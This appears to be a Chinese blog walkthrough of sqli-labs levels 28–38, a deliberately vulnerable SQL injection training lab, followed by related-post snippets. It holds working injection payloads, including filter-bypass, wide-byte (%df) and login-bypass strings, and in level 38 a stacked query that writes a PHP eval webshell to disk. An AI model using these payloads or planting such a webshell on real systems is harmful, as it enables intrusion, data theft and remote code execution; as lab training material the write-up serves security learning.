【sql-labs】闯关记录28~38详解

最新推荐文章于 2024-03-17 15:41:51 发布
最新推荐文章于 2024-03-17 15:41:51 发布
阅读量574 收藏 4
点赞数 2
分类专栏: sql注入 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/116089614
版权

【sql-labs】闯关记录28~38


【less-28】过滤union%0aselect

image-20210422230001428

测试流程

?id=1') and%0a'1'=('1  #成功回显
?id=1') and%0a'1'=('2  #会显失败

#测试回显字段
?id=232323') %0aunion%0aselect%0a1,2,3%0aand%0a'1'=('1  
#发现union%0aselect被过滤了
#于是混淆双写,成功绕过
?id=232323') %0auniunion%0aselecton%0aselect%0a1,2,3%0aand%0a'1'=('1

#查询数据库名
?id=232323') %0auniunion%0aselecton%0aselect%0a1,database(),3%0aand%0a'1'=('1

#查询表名
?id=232323') %0auniunion%0aselecton%0aselect%0a1,group_concat(table_name),3%0afrom%0ainformation_schema.tables%0a where%0a table_schema=database()and%0a'1'=('1

#接下来查字段名、字段值依次类推

核心代码

image-20210422225925587

小结

闭合方式为(’’)

过滤了union%0aselect,直接双写绕过即可


【less-28a】关闭了错误回显

说是盲注,但依然可以回显,用上一关的payload依然可以

image-20210422230516309

核心代码

image-20210422230420561

如图所示过滤掉了union%0aselect


【less-29】世界最好的防火墙

嗯?到底用了什么过滤策略,敢说是全世界最好的防火墙?

image-20210423205923497

测试流程
?id=1         #成功回显
?id=1'        #直接报错
?id=1' and 1=1%23    #成功回显
?id=1' order by 3   #成功回显
?id=1' order by 4   #回显失败,说明主查询字段数为3

?id=1' and 1=2 union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database()%23
#暴数据库名,数据库表
#接下来暴字段名,字段值

没有任何过滤字符,还好意思说自己是世界上最好的防火墙 |=_=|


【less-30】世界上最好的防火墙

image-20210423211641996

测试流程
?id=1     #回显正常
?id=1'    #依然回显正常
?id=1"    #回显异常,说明有可能是"闭合
?id=1" and 1=1%23  #回显正常
?id=1" order by 3%23   #order by测试出主查询字段数为3
?id=1" and 1=2 union select 1,2,3%23  #测试出回显点为2,3
#然后暴数据库名、表名、字段名、字段值,和以前套路一样
小结

与上一关相比,只是闭合方式不同。这防火墙真不靠谱|=_=|


【less-31】世界上最好的WAF

image-20210423212830007

测试流程
?id=1        #回显正常
?id=1'       #回显正常
?id=1"       #直接报错,说明闭合方式可能是"
?id=1" and 1=1--+   #依然报错
?id=1") and 1=1--+   #回显成功
?id=1") and 1=2 union select 1,2,database()--+  #暴数据库名
#接下来暴表名、字段名、字段值等和之前一样
小结

和上一关相比只是闭合方式不同"),这个全世界最好的WAF也不咋地|=_=|


【less-32】宽字节注入

image-20210423214112957

测试流程
?id=1'     #发现'被注释
?id=1%df'   #单引号直接逃逸,导致报错
?id=1%df' and 1=1%23   #回显正常
?id=1%df' and 1=2%23   #回显异常
#然后剩下就是order by字段数,查数据库名、查表名、查字段名、查字段值
核心代码

image-20210423214803576

如图所示,分别对反斜线、单引号和双引号进行了转义,本来就比较安全了,但是关键在于下面一句:

image-20210423214823039

将接收的参数用宽字节gbk去解释,所以造成宽字节注入。


【less-33】宽字节注入

image-20210423220515599

测试流程
?id=1   #回显正常
?id=1'   #回显正常,发现单引号被转义
?id=1%df' and 1=1%23   #回显正常
#接下来步骤和之前一样
核心代码

image-20210423220902016

image-20210423220913415

小结

与上一关不同的是,这一关用了addslashes()函数过滤,实质效果一样。


【less-34】post宽字节注入

image-20210423221635633

是一个表单,首先尝试万能密码登录

image-20210423221752320

结果失败,发现单引号被转义了。

于是考虑一波宽字节注入:

image-20210423221904719

image-20210423221920397

成功登录!


【less-35】数字型注入

image-20210423222302201

虽然用了addslashes()函数做了转义,但是为数字型注入,根本不妨碍注入,直接绕过。


【less-36】宽字节注入

关于宽字节注入原理请参照文章传送门


【less-37】post宽字节注入

相比于less-34关只是转义的函数不同,实质效果一样。

less-34:

image-20210423223114716

less-37:

image-20210423223043951


【less-38】堆叠注入

image-20210424135203842

写入webshell

?id=1';select '<?php @eval($_POST[x])?>' into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs\\test.php'%23

用菜刀连接:

image-20210424135314875

成功!

写入webshell条件:

1、知道网站上可以写的绝对路径

2、该目录有写入权限

3、数据库开启了secure_file_priv权限

image-20210424135659577

0ak1ey
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi Labs Lesson28 & Lesson28a
1ame的博客
08-23 335
Lesson - 28a GET - Error Based - All your UNION & SELECT Belong to US - String - Single Quotes with parenthesis 欢迎界面: 构造 ?id=1,结果如图所示: 构造 ?id=1',结果没有任何信息,应该是关闭了错误错误回显。 构造 ?id=1" z
sql-labs通关技巧
03-01
SQL注入常用靶场的通关技巧
SqliLab Less23-28 WriteUp
jhzzzz的博客
01-24 232
文章目录二次排序注入绕过注释符注入 二次排序注入 绕过注释符注入
sqllab第二十八关通关笔记(附带28a)
最新发布
I_WORM的博客
03-17 282
构造payload:id=0%27)union%09all%09select%091,database(),3%09=(%271。重新构造payload:id=0%27)union%09all%09select%091,2,3%09and1=(%271。构造payload:id=-1%27)union%09all%09select%091,2,3%09and1=(%271。页面成功回显了,但是内容不是输入信息,应该是他把-1进行绝对值处理了,导致显示了id=1的内容。好,尝试进行错误注入。
Sqlilabs-28
KAKA的博客
07-14 423
因为是 Winodws 那就盲注吧,这跟 26a27a 关卡一样, payload 改改就可以用了,这一关同样把报错信息给过滤了,所以报错注入用不了: –查表 http://sqlilabs/Less-28/?id=1')and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(tabl
SQL-labs的第28关——union和select被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-04 287
该关的空格、-和注释也别屏蔽了。这里是屏蔽union select这个组合而不是单个的union或select。并且该关不返回错误,所以不使用?id=1\,而且也不使用报错注入。
Sqli-labs之Less-28和Less-28a
→_→
04-27 1333
Less-28 基于错误的,单引号字符型,过滤了union和select等的注入 判断注入类型 1和1"正常回显,1'报错,单引号字符型。2'%26%26'1'='1回显为id=1,有小括号。 参看源码: 发现没有过滤or与and。 过滤了相...
sqli-labs(28-28a)
qq_43579362的博客
02-15 1387
Less-28 1.测试http://127.0.0.1/sqli-labs/Less-28/?id=1%27,页面回显不正常,但又没有错误提示,报错注入没戏,尝试闭合语句,加单引号回显不正常,说明sql语句闭合至少有',可能有),判断有无)在Less-26已经写过,经过验证确实含有'。 2.尝试使用联合查询注入,构造语句http://127.0.0.1/sqli-labs/Less-28/?id...
sqli-labs闯关小游戏21-65.docx
10-23
这是个关于sql注入的文档,是sqli-labs闯关小游戏二十一关到六十五关的详解,每一关的步骤写得都很详细,前二十关的话我已经发布了博客,有需要的可以下载一下。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sql-labs 1-10关 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
sqli-labs进阶篇 25_28
Lucky小小吴的小屋
01-30 896
一、如何判断单/双引号注入? ?id=1' 报错了,一定是单引号注入 -- 解析下 ①如果是双引号注入:"XXX" 输入:?id=1" or 1=1 执行:"1" or 1=1 " 结果:报错 ②如果是单引号注入:'XXX' 输入:?id=1" or 1=1 执行:'?id=1" or 1=1' 结果:id=1,执行成功 二、如何判断闭合注入? 以单引号为例 三、怎么绕过一些字符? 一般是使用3种方法进行绕过,分别是URL编码、大小写、重写 (1)URL编码的常见字符 %09
sqli-labs————Less-28
Fly_鹏程万里
05-16 1064
Less 28这一关于之前的27关没有什么差别,这里直接给出一个payload,用户可以自己思考自我测试,如果有不清楚的可以查看之前的第27关的详细介绍。payload:http://192.168.11.136/sqli-labs/Less-28?id=1')union%a0select(1),(user()),(3)||('1...
sqli-labs/Less-28
m0_71299382的博客
11-20 332
sqli-labs第二十八a关
sqli-labs(28)---原创原创自此一家
weixin_30437847的博客
05-29 669
0X01构造闭合 ’报错 )报错 其他不报错 那我们猜想是不是')的闭合 ?id=1')||('1')=('1 返回正确 那么好像猜对了 0X02爆表名 过滤了相连接的union和select ?id=')%0AUNIOn%0ASELECt%0A1,database(),3and%0A('1')=('1 这里过滤了相连接的union select 那咋办呐? ...
sqli-labs-less-23~28
giun的博客
02-14 505
Less-23 过滤了#,–,那么我们需要采用闭合引号方式进行注入, http://127.0.0.1/sqli-labs-master/Less-23/?id=-1%27%20union%20select%201,@@basedir,%273 http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,@@datadir...
SQL注入详解 23-28
君莫hacker的博客
10-08 650
目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36 Less-23 确定注入类型并判断显示位置 -1' union select 22,33,44 and '1'='1 查看当前数据库 -1' union select 3,database(),3 or '12'='12 爆表 -1' union select 22,group_conca
sqlilab 20-28a之看不懂的教程
跳房子的博客
01-22 1050
第二十关: 接着上面19关的方法,我这里用正确的账号密码登录后发现页面显示了我的Cookie,立刻联想到Cookie注入,还是一样用Burp进行抓包,通过修改Cookie对上面的猜想进行验证 先构造出  uname=admin' 之后页面出现报错,接着构造uname=admin' -- #之后恢复正常,说明是单引号注入, 下面用order by判断字段数,当输入 uname=admin' o...
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1. 下载sqli-labs:您可以在GitHub上找到sqli-labs的源代码并下载到本地环境。 2. 配置环境:根据sqli-labs的README文件,您需要配置适当的web服务器环境(例如Apache、PHP等)以及数据库(例如MySQL)。 3. 导入数据库:使用提供的SQL脚本文件,导入sqli-labs所需的数据库结构和数据。 4. 开始闯关:访问您的本地服务器,并根据提示依次完成每个关卡。每个关卡都会提供一个具有潜在SQL注入漏洞的页面,您需要利用这些漏洞来获取敏感信息或执行其他恶意操作。 5. 学习和实践:在完成每个关卡后,阅读解释和提示,深入了解所使用的攻击技术和漏洞原理。尝试自己设计和实现一些新的攻击方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值